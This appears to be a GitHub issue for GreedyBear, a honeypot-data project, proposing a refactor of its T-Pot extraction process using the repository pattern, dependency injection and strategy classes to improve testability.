GreedyBear icon indicating copy to clipboard operation
GreedyBear copied to clipboard

Rework extraction process

Open regulartim opened this issue 1 week ago • 0 comments

The process of extracting data from T-Pot and writing into our database is one of the most important parts of GreedyBear. However it has some problems:

  • it is not very well testable: many functions and methods directly depend on the presence of elastic stack and/or of the the GreedyBear database which makes them hard to test when these data sources are missing
  • classes like ExtractAttacks have many different responsibilities and should be split up into separate service classes
  • the special treatment of Log4j and Cowrie is deeply baked into the process (although Log4j is not that relevant anymore)

I am currently working on an improved process following some best practices:

  • repository pattern: repository pattern handle data access without containing any processing logic
  • single responsibility: every class in the process has one clear and recognizable responsibility
  • dependency injection: dependencies are injected through constructors which makes testing much easier
  • strategy pattern: makes it easier to add new "special treatment" for honeypots

I will open a PR soon which contains the most profound changes to the logic. After that code is merged, I would also like to streamline the Cowrie extraction process and add end to end pipeline tests. But I'll open separate issues for that.

regulartim avatar Dec 17 '25 12:12 regulartim